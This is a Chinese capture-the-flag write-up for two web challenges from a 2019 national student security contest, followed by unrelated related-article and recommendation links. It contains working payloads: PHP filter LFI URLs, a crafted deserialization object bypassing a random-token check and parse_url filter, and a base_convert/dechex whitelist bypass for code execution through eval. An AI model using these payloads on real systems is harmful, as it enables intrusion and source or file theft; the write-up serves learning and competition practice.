简单小结

菜鸟第一次打国赛,这次题目质量很高,学到了许多姿势。

Web

Justsoso

打开题目,源代码出存在提示:



使用LFI读取index.php与hint.php

http://d4dc224926cd47bca560b0ec2f84bad155efe5b747574b89.changame.ichunqiu.com/?file=php://filter/read=convert.base64-encode/resource=index.php

http://d4dc224926cd47bca560b0ec2f84bad155efe5b747574b89.changame.ichunqiu.com/?file=php://filter/read=convert.base64-encode/resource=hint.php

得如下源码:

<html>

<?php

error_reporting(0);

$file = $_GET["file"];

$payload = $_GET["payload"];

if(!isset($file)){

	echo 'Missing parameter'.'<br>';

}

if(preg_match("/flag/",$file)){

	die('hack attacked!!!');

}

@include($file);

if(isset($payload)){

    $url = parse_url($_SERVER['REQUEST_URI']);

    parse_str($url['query'],$query);

    foreach($query as $value){

        if (preg_match("/flag/",$value)) {

    	    die('stop hacking!');

    	    exit();

        }

    }

    $payload = unserialize($payload);

}else{

   echo "Missing parameters";

}

?>

<!--Please test index.php?file=xxx.php -->

<!--Please get the source of hint.php-->

</html>

<?php

class Handle{

    private $handle;

    public function __wakeup(){

		foreach(get_object_vars($this) as $k => $v) {

            $this->$k = null;

        }

        echo "Waking up\n";

    }

	public function __construct($handle) {

        $this->handle = $handle;

    }

	public function __destruct(){

		$this->handle->getFlag();

	}

}

class Flag{

    public $file;

    public $token;

    public $token_flag;

    function __construct($file){

		$this->file = $file;

		$this->token_flag = $this->token = md5(rand(1,10000));

    }

	public function getFlag(){

		$this->token_flag = md5(rand(1,10000));

        if($this->token === $this->token_flag)

		{

			if(isset($this->file)){

				echo @highlight_file($this->file,true);

            }

        }

    }

}

?>

很容易可以知道此题考的是php反序列化,通过file引入hint.phpindex.php,操作payload反序列化执行类中的getflag()函数

此题有两个难点:

正则Flag判断绕过与随机数md5判断的绕过

前者可通过使用 /// 绕过parse_url()函数,此时该函数获取到的内容为空,而后者可以使用指针来将token_flag指向token,来使两者恒等。

添加以下代码在本地生成序列化字符串:

$a = new Flag(‘flag.php’);

$a->token_flag = &$a->token;

$b = new Handle($a);

echo urlencode(serialize($b));

输出的结果为:

O%3A6%3A%22Handle%22%3A1%3A%7Bs%3A14%3A%22%00Handle%00handle%22%3BO%3A4%3A%22Flag%22%3A3%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22token%22%3Bs%3A32%3A%22bc573864331a9e42e4511de6f678aa83%22%3Bs%3A10%3A%22token_flag%22%3BR%3A4%3B%7D%7D

注意里边有不可见字符%00,且需要将Handle的对象数量改成2+,这样才可以进入__destruct函数。

故最终payload为:

///index.php?file=hint.php&payload=O:6:"Handle":2:{s:14:"%00Handle%00handle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";s:32:"bc573864331a9e42e4511de6f678aa83";s:10:"token_flag";R:4;}}

love_math

打开题目,发现在js地址出使用ajax向calc.php发送数据

使用浏览器访问之,得源码

<?php

error_reporting(0);

//听说你很喜欢数学,不知道你是否爱它胜过爱flag

if(!isset($_GET['c'])){

    show_source(__FILE__);

}else{

    //例子 c=20-1

    $content = $_GET['c'];

    if (strlen($content) >= 80) {

        die("太长了不会算");

    }

    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];

    foreach ($blacklist as $blackitem) {

        if (preg_match('/' . $blackitem . '/m', $content)) {

            die("请不要输入奇奇怪怪的字符");

        }

    }

    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp

    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];

    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);

    foreach ($used_funcs[0] as $func) {

        if (!in_array($func, $whitelist)) {

            die("请不要输入奇奇怪怪的函数");

        }

    }

    //帮你算出答案

    eval('echo '.$content.';');

}

可以看到过滤了一些常用字符和基于白名单的过滤,

限制得比较死,故此处我们只能使用白名单内的函数来进行命令执行,且不能有黑名单内的字符。

我们注意到,白名单里边的base_convert、dechex、decbin等用于进制转换的函数,我们可以使用其来绕过基于白名单的检测。比如:phpinfo可以将phpinfo先转换成hex,在转换成十进制,这样就可以做到无字母执行函数。

由于长度问题,我们无法直接在参数c里传过多的白名单函数+字符,所以这里我们使用其他GET参数传入,不直接使用参数c,即可绕过,但要注意的是此处的参数名,不能为字母,只能为数字,不然会被第二个关键词白名单所拦截。

再由于Ascii转成Hex后转回来需要hex2bin函数,而白名单里并没有这个函数,所以我们需要使用进制转换进行绕过,又因为hex2bin里部分字母只有在32进制后才会出现,所以此处我们选择36进制。将hex2bin36进制成无字母的10进制得到:37907361743我们使用base_convert(37907361743,10,36即可转换成hex2bin,而_GEThex5f474554,里边包含了字母f,需要在进行一次转换:f正好为16进制里的最后一个字母,可直接使用dechex(1598506324)即可绕过。故$sin=base_convert(37907361743,10,36)(dechex(1598506324))即为$sin=_GET

接着我们继续构造:

我们知道:$$sin = $_GET

那么$$sin[a]()即可自定义函数名,但主要此处参数不可为字母,且[]被过滤,故改成`$$sin{0}($$sin{1})``

所以payload构造如下:

?C=$sin=base_convert(37907361743,10,36)(dechex(1598506324));$$sin{0}($$sin{1});&0=show_source&1=flag.php

2019全国大学生信息安全大赛两道web的更多相关文章

  1. 2019年上海市大学生网络安全大赛两道misc WriteUp

    2019年全国大学生网络安全邀请赛暨第五届上海市大学生网络安全大赛 做出了两道Misc== 签到 题干 解题过程 题干提示一直注册成功,如果注册失败也许会出现flag. 下载下来是包含010edito ...

  2. 2019全国大学生信息安全竞赛部分Web writeup

    JustSoso 0x01 审查元素发现了提示,伪协议拿源码 /index.php?file=php://filter/read=convert.base64-encode/resource=inde ...

  3. 2019全国大学生信息安全与对抗技术竞赛全国线下总决赛 Writeup

    0x00 Begin 关于 ISCC 2019 北理工总决赛,这一次比赛体验感总体差不多,最后我们战队荣获全国一等奖第一名,在这里非常感谢我的团队以及我的队友. 0x01 Reverse 下载题目:e ...

  4. 第16届(2019)全国大学生信息安全与对抗技术竞赛全国线下总决赛 Writeup

    笔者<Qftm>原文发布<BitHack>:https://bithack.io/forum/469/answer/333 0x00 Begin 关于 ISCC 2019 北理 ...

  5. 2019全国大学生信息安全竞赛初赛pwn前四题writeup—栈部分

    ret to libc技巧:https://blog.csdn.net/zh_explorer/article/details/80306965 如何leak出libc地址:基地址+函数在libc中的 ...

  6. 2019全国大学生信息安全竞赛ciscn-writeup(4web)

    web1-JustSoso php伪协议获取源码 ?file=php://filter/read=convert.base64-encode/resource=index.php index.php ...

  7. 【逆向笔记】2017年全国大学生信息安全竞赛 Reverse 填数游戏

    2017年全国大学生信息安全竞赛 Reverse 填数游戏 起因是吾爱破解大手发的解题思路,觉得题挺有意思的,就找来学习学习 这是i春秋的下载链接 http://static2.ichunqiu.co ...

  8. 2019balsn两道web和2019巅峰极客一道web记录

    遇到3道有点意思的web,记录一下~ web1 题目地址:http://warmup.balsnctf.com/ 源码如下所示: <?php if (($secret = base64_deco ...

  9. 2019第十二届全国大学生信息安全实践创新赛线上赛Writeup

    本文章来自https://www.cnblogs.com/iAmSoScArEd/p/10780242.html  未经允许不得转载! 1.MISC-签到 下载附件后,看到readme.txt打开后提 ...

随机推荐

  1. js的内存泄漏场景、监控以及分析

    内存泄漏 Q:什么是内存泄漏? 字面上的意思,申请的内存没有及时回收掉,被泄漏了 Q:为什么会发生内存泄漏? 虽然前端有垃圾回收机制,但当某块无用的内存,却无法被垃圾回收机制认为是垃圾时,也就发生内存 ...

  2. 【原创】Dubbo 2.7.5在线程模型上的优化

    这是why技术的第30篇原创文章 这可能是全网第一篇解析Dubbo 2.7.5里程碑版本中的改进点之一:客户端线程模型优化的文章. 先劝退:文本共计8190字,54张图.阅读之前需要对Dubbo相关知 ...

  3. 关于爬虫的日常复习(17)——scrapy系列1

  4. restframework 视图

    重要知识点 as_view()获取的是view方法名,当url配版成功,执行view方法 一.逻辑封装(mixins, generics) path('author/', views.AuthorVi ...

  5. [bzoj4815] [洛谷P3700] [Cqoi2017] 小Q的表格

    Description 小Q是个程序员. 作为一个年轻的程序员,小Q总是被老C欺负,老C经常把一些麻烦的任务交给小Q来处理. 每当小Q不知道如何解决时,就只好向你求助.为了完成任务,小Q需要列一个表格 ...

  6. 美食家app开发日记

    民以食为天. 作为一个20年几乎没做过饭的吃货,从这个假期开始,想利用些时间,自己动手尝试,做些好吃的出来,一方面给父母减轻点负担,获得点成就感,一方面体验生活,学学厨艺,感受生活的乐趣和美好,其三, ...

  7. python接口自动化测试 - openpyxl封装类

    前言 为了更好的让openpyxl在工作中使用,将openpyxl的常用操作封装起来,这样不仅复用性高,而且阅读性好 直接上代码 #!/usr/bin/env python # -*- coding: ...

  8. 网络io模型总结

    操作系统基本概念 首先来来说下操作系统,嗯,操作系统是计算机硬件的管理软件,是对计算机硬件的抽象,操作系统将应用程序分为用户态和内核态,例如驱动程序就位于内核态,而我们写的一般程序都是用户态,包括we ...

  9. HTML5浏览器支持及兼容性处理

    1.现代的浏览器都支持HTML5. 2.所有浏览器不管是新的还是旧的对无法识别的元素会作为内联元素自动处理. 3.HTML5定义了8个HTML语义元素,所有这些元素都是块级元素,为了能让旧版本的浏览器 ...

  10. robotframework,移动端(小程序)自动化,获取元素属性值的方法

    如下图,获取商品价格 属性值显示在content-desc内 传统的get text指定是无法获得到这个元素指定属性的值的 只有通过使用AppiumLibrary.get element attrib ...